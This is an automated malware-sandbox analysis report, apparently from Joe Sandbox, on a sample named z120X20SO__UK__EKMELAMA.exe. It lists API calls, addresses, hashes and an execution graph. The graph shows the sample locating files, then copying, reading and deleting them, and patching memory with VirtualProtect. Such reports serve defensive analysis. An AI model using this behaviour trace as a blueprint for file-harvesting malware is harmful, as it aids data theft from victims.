                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 2659869361-3081826266
                                                                                                                                                              • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                                                                                              • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                                                                                                                              • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                                                                                              • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                                                                                                                              APIs
                                                                                                                                                              • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,?,00405B94,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                                                                                                              • CharNextA.USER32(00000000), ref: 00405B3B
                                                                                                                                                              • CharNextA.USER32(00000000), ref: 00405B4F
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\nsv6948.tmp, xrefs: 00405B29
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharNext
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsv6948.tmp
                                                                                                                                                              • API String ID: 3213498283-2869690662
                                                                                                                                                              • Opcode ID: 1e979eba324918ca677e02d4c6d61fe282ba8a8b0f982e42ab73b577f73820d9
                                                                                                                                                              • Instruction ID: 848bba76345d44d343176f3465f76df5d991b1e8c7a01042d4308139c478d0e0
                                                                                                                                                              • Opcode Fuzzy Hash: 1e979eba324918ca677e02d4c6d61fe282ba8a8b0f982e42ab73b577f73820d9
                                                                                                                                                              • Instruction Fuzzy Hash: 29F0F651904F582BFB3266240C44F777BA8CB55350F18447BD240B72C2C67C7C414F9A
                                                                                                                                                              APIs
                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,0040301B,?), ref: 00402E50
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402E6E
                                                                                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2102729457-0
                                                                                                                                                              • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                                                                                                              • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                                                                                                                              • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                                                                                                              • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                                                                                                                              APIs
                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004051C1
                                                                                                                                                              • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                                                                                                                                • Part of subcall function 004041C7: SendMessageA.USER32(0001042A,00000000,00000000,00000000), ref: 004041D9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                              • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                                                                                                              • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                                                                                                                              • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                                                                                                              • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004057CC
                                                                                                                                                              Strings
                                                                                                                                                              • Error launching installer, xrefs: 004057A9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                              • String ID: Error launching installer
                                                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                                                              • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                                                                                                              • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                                                                                                                              • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                                                                                                              • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                                                                                                                              • GlobalFree.KERNEL32(007847C8), ref: 00403896
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 1100898210-3081826266
                                                                                                                                                              • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                                                                                                              • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                                                                                                                              • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                                                                                                              • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe,C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe,80000000,00000003), ref: 00405ADC
                                                                                                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe,C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe,80000000,00000003), ref: 00405AEA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharPrevlstrlen
                                                                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                                                                              • API String ID: 2709904686-224404859
                                                                                                                                                              • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                                                                                              • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                                                                                                                              • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                                                                                              • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                                                                                                                              APIs
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6F95115B
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F9511B4
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F9511C7
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F9511F5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2314184359.000000006F951000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F950000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2314019695.000000006F950000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314334219.000000006F953000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314455683.000000006F955000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_6f950000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Global$Free$Alloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1780285237-0
                                                                                                                                                              • Opcode ID: 9257c2a51f6a2c90710dca35d617e2ed5e2bc939e0096ec4b9b0aec68e6df44b
                                                                                                                                                              • Instruction ID: e3004dc554660fe6c4bbe37d902100c99e53cc57dd9e73d61763b6264e50123b
                                                                                                                                                              • Opcode Fuzzy Hash: 9257c2a51f6a2c90710dca35d617e2ed5e2bc939e0096ec4b9b0aec68e6df44b
                                                                                                                                                              • Instruction Fuzzy Hash: 7531BEB1408644AFEF60CF78D958A667FF8FB07260B240196E855D62D0D734E8B5CF20
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                              • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                                                                                              • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                                                                                                                              • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                                                                                              • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:1.9%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                              Signature Coverage:0.5%
                                                                                                                                                              Total number of Nodes:214
                                                                                                                                                              Total number of Limit Nodes:5
                                                                                                                                                              execution_graph 8529 3685c7a7 8530 3685c7be 8529->8530 8535 3685c82c 8529->8535 8530->8535 8541 3685c7e6 GetModuleHandleA 8530->8541 8531 3685c835 GetModuleHandleA 8534 3685c83f 8531->8534 8532 3685c872 8534->8534 8534->8535 8537 3685c85f GetProcAddress 8534->8537 8535->8531 8535->8532 8535->8534 8536 3685c7dd 8536->8534 8536->8535 8538 3685c800 GetProcAddress 8536->8538 8537->8535 8538->8535 8539 3685c80d VirtualProtect 8538->8539 8539->8535 8540 3685c81c VirtualProtect 8539->8540 8540->8535 8542 3685c7ef 8541->8542 8544 3685c82c 8541->8544 8553 3685c803 GetProcAddress 8542->8553 8546 3685c835 GetModuleHandleA 8544->8546 8547 3685c872 8544->8547 8552 3685c83f 8544->8552 8545 3685c7f4 8545->8544 8548 3685c800 GetProcAddress 8545->8548 8546->8552 8548->8544 8549 3685c80d VirtualProtect 8548->8549 8549->8544 8550 3685c81c VirtualProtect 8549->8550 8550->8544 8551 3685c85f GetProcAddress 8551->8544 8552->8544 8552->8551 8554 3685c82c 8553->8554 8555 3685c80d VirtualProtect 8553->8555 8557 3685c835 GetModuleHandleA 8554->8557 8558 3685c872 8554->8558 8555->8554 8556 3685c81c VirtualProtect 8555->8556 8556->8554 8560 3685c83f 8557->8560 8559 3685c85f GetProcAddress 8559->8560 8560->8554 8560->8559 8561 36851c5b 8562 36851c6b ___scrt_fastfail 8561->8562 8565 368512ee 8562->8565 8564 36851c87 8566 36851324 ___scrt_fastfail 8565->8566 8567 368513b7 GetEnvironmentVariableW 8566->8567 8591 368510f1 8567->8591 8570 368510f1 57 API calls 8571 36851465 8570->8571 8572 368510f1 57 API calls 8571->8572 8573 36851479 8572->8573 8574 368510f1 57 API calls 8573->8574 8575 3685148d 8574->8575 8576 368510f1 57 API calls 8575->8576 8577 368514a1 8576->8577 8578 368510f1 57 API calls 8577->8578 8579 368514b5 lstrlenW 8578->8579 8580 368514d9 lstrlenW 8579->8580 8590 368514d2 8579->8590 8581 368510f1 57 API calls 8580->8581 8582 36851501 lstrlenW lstrcatW 8581->8582 8583 368510f1 57 API calls 8582->8583 8584 36851539 lstrlenW lstrcatW 8583->8584 8585 368510f1 57 API calls 8584->8585 8586 3685156b lstrlenW lstrcatW 8585->8586 8587 368510f1 57 API calls 8586->8587 8588 3685159d lstrlenW lstrcatW 8587->8588 8589 368510f1 57 API calls 8588->8589 8589->8590 8590->8564 8592 36851118 ___scrt_fastfail 8591->8592 8593 36851129 lstrlenW 8592->8593 8604 36852c40 8593->8604 8596 36851177 lstrlenW FindFirstFileW 8598 368511e1 8596->8598 8599 368511a0 8596->8599 8597 36851168 lstrlenW 8597->8596 8598->8570 8600 368511c7 FindNextFileW 8599->8600 8601 368511aa 8599->8601 8600->8599 8602 368511da FindClose 8600->8602 8601->8600 8606 36851000 8601->8606 8602->8598 8605 36851148 lstrcatW lstrlenW 8604->8605 8605->8596 8605->8597 8607 36851022 ___scrt_fastfail 8606->8607 8608 368510af 8607->8608 8609 3685102f lstrcatW lstrlenW 8607->8609 8612 368510b5 lstrlenW 8608->8612 8622 368510ad 8608->8622 8610 3685106b lstrlenW 8609->8610 8611 3685105a lstrlenW 8609->8611 8623 36851e89 lstrlenW 8610->8623 8611->8610 8637 36851e16 8612->8637 8615 368510ca 8617 36851e89 5 API calls 8615->8617 8615->8622 8616 36851088 GetFileAttributesW 8618 3685109c 8616->8618 8616->8622 8619 368510df 8617->8619 8618->8622 8629 3685173a 8618->8629 8642 368511ea 8619->8642 8622->8601 8624 36852c40 ___scrt_fastfail 8623->8624 8625 36851ea7 lstrcatW lstrlenW 8624->8625 8626 36851ed1 lstrcatW 8625->8626 8627 36851ec2 8625->8627 8626->8616 8627->8626 8628 36851ec7 lstrlenW 8627->8628 8628->8626 8630 36851747 ___scrt_fastfail 8629->8630 8657 36851cca 8630->8657 8632 3685199f 8632->8622 8635 36851824 ___scrt_fastfail _strlen 8635->8632 8677 368515da 8635->8677 8638 36851e29 8637->8638 8641 36851e4c 8637->8641 8639 36851e2d lstrlenW 8638->8639 8638->8641 8640 36851e3f lstrlenW 8639->8640 8639->8641 8640->8641 8641->8615 8643 3685120e ___scrt_fastfail 8642->8643 8644 36851e89 5 API calls 8643->8644 8645 36851220 GetFileAttributesW 8644->8645 8646 36851235 8645->8646 8647 36851246 8645->8647 8646->8647 8649 3685173a 35 API calls 8646->8649 8648 36851e89 5 API calls 8647->8648 8650 36851258 8648->8650 8649->8647 8651 368510f1 56 API calls 8650->8651 8652 3685126d 8651->8652 8653 36851e89 5 API calls 8652->8653 8654 3685127f ___scrt_fastfail 8653->8654 8655 368510f1 56 API calls 8654->8655 8656 368512e6 8655->8656 8656->8622 8658 36851cf1 ___scrt_fastfail 8657->8658 8659 36851d0f CopyFileW CreateFileW 8658->8659 8660 36851d55 GetFileSize 8659->8660 8661 36851d44 DeleteFileW 8659->8661 8662 36851ede 22 API calls 8660->8662 8666 36851808 8661->8666 8663 36851d66 ReadFile 8662->8663 8664 36851d94 CloseHandle DeleteFileW 8663->8664 8665 36851d7d CloseHandle DeleteFileW 8663->8665 8664->8666 8665->8666 8666->8632 8667 36851ede 8666->8667 8669 3685222f 8667->8669 8670 3685224e 8669->8670 8673 36852250 8669->8673 8685 3685474f 8669->8685 8690 368547e5 8669->8690 8670->8635 8672 36852908 8674 368535d2 __CxxThrowException@8 RaiseException 8672->8674 8673->8672 8697 368535d2 8673->8697 8676 36852925 8674->8676 8676->8635 8678 3685160c _strcat _strlen 8677->8678 8679 3685163c lstrlenW 8678->8679 8785 36851c9d 8679->8785 8681 36851655 lstrcatW lstrlenW 8682 36851678 8681->8682 8683 36851693 ___scrt_fastfail 8682->8683 8684 3685167e lstrcatW 8682->8684 8683->8635 8684->8683 8700 36854793 8685->8700 8688 3685478f 8688->8669 8689 36854765 8706 36852ada 8689->8706 8692 368556d0 _abort 8690->8692 8691 3685570e 8719 36856368 8691->8719 8692->8691 8693 368556f9 RtlAllocateHeap 8692->8693 8696 3685474f _abort 7 API calls 8692->8696 8693->8692 8695 3685570c 8693->8695 8695->8669 8696->8692 8699 368535f2 RaiseException 8697->8699 8699->8672 8701 3685479f ___scrt_is_nonwritable_in_current_image 8700->8701 8713 36855671 RtlEnterCriticalSection 8701->8713 8703 368547aa 8714 368547dc 8703->8714 8705 368547d1 _abort 8705->8689 8707 36852ae5 IsProcessorFeaturePresent 8706->8707 8708 36852ae3 8706->8708 8710 36852b58 8707->8710 8708->8688 8718 36852b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8710->8718 8712 36852c3b 8712->8688 8713->8703 8717 368556b9 RtlLeaveCriticalSection 8714->8717 8716 368547e3 8716->8705 8717->8716 8718->8712 8722 36855b7a GetLastError 8719->8722 8723 36855b93 8722->8723 8724 36855b99 8722->8724 8741 36855e08 8723->8741 8728 36855bf0 SetLastError 8724->8728 8748 3685637b 8724->8748 8731 36855bf9 8728->8731 8729 36855bb3 8755 3685571e 8729->8755 8731->8695 8734 36855bcf 8768 3685593c 8734->8768 8735 36855bb9 8736 36855be7 SetLastError 8735->8736 8736->8731 8739 3685571e _free 17 API calls 8740 36855be0 8739->8740 8740->8728 8740->8736 8773 36855c45 8741->8773 8743 36855e2f 8744 36855e47 TlsGetValue 8743->8744 8745 36855e3b 8743->8745 8744->8745 8746 36852ada _ValidateLocalCookies 5 API calls 8745->8746 8747 36855e58 8746->8747 8747->8724 8753 36856388 _abort 8748->8753 8749 368563c8 8752 36856368 __dosmaperr 19 API calls 8749->8752 8750 368563b3 RtlAllocateHeap 8751 36855bab 8750->8751 8750->8753 8751->8729 8761 36855e5e 8751->8761 8752->8751 8753->8749 8753->8750 8754 3685474f _abort 7 API calls 8753->8754 8754->8753 8756 36855729 HeapFree 8755->8756 8760 36855752 __dosmaperr 8755->8760 8757 3685573e 8756->8757 8756->8760 8758 36856368 __dosmaperr 18 API calls 8757->8758 8759 36855744 GetLastError 8758->8759 8759->8760 8760->8735 8762 36855c45 _abort 5 API calls 8761->8762 8763 36855e85 8762->8763 8764 36855ea0 TlsSetValue 8763->8764 8767 36855e94 8763->8767 8764->8767 8765 36852ada _ValidateLocalCookies 5 API calls 8766 36855bc8 8765->8766 8766->8729 8766->8734 8767->8765 8779 36855914 8768->8779 8776 36855c71 8773->8776 8778 36855c75 __crt_fast_encode_pointer 8773->8778 8774 36855c95 8777 36855ca1 GetProcAddress 8774->8777 8774->8778 8775 36855ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 8775->8776 8776->8774 8776->8775 8776->8778 8777->8778 8778->8743 8780 36855854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 8779->8780 8781 36855938 8780->8781 8782 368558c4 8781->8782 8783 36855758 _abort 20 API calls 8782->8783 8784 368558e8 8783->8784 8784->8739 8786 36851ca6 _strlen 8785->8786 8786->8681

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 36851137
                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 36851151
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3685115C
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3685116D
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3685117C
                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 36851193
                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 368511D0
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 368511DB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
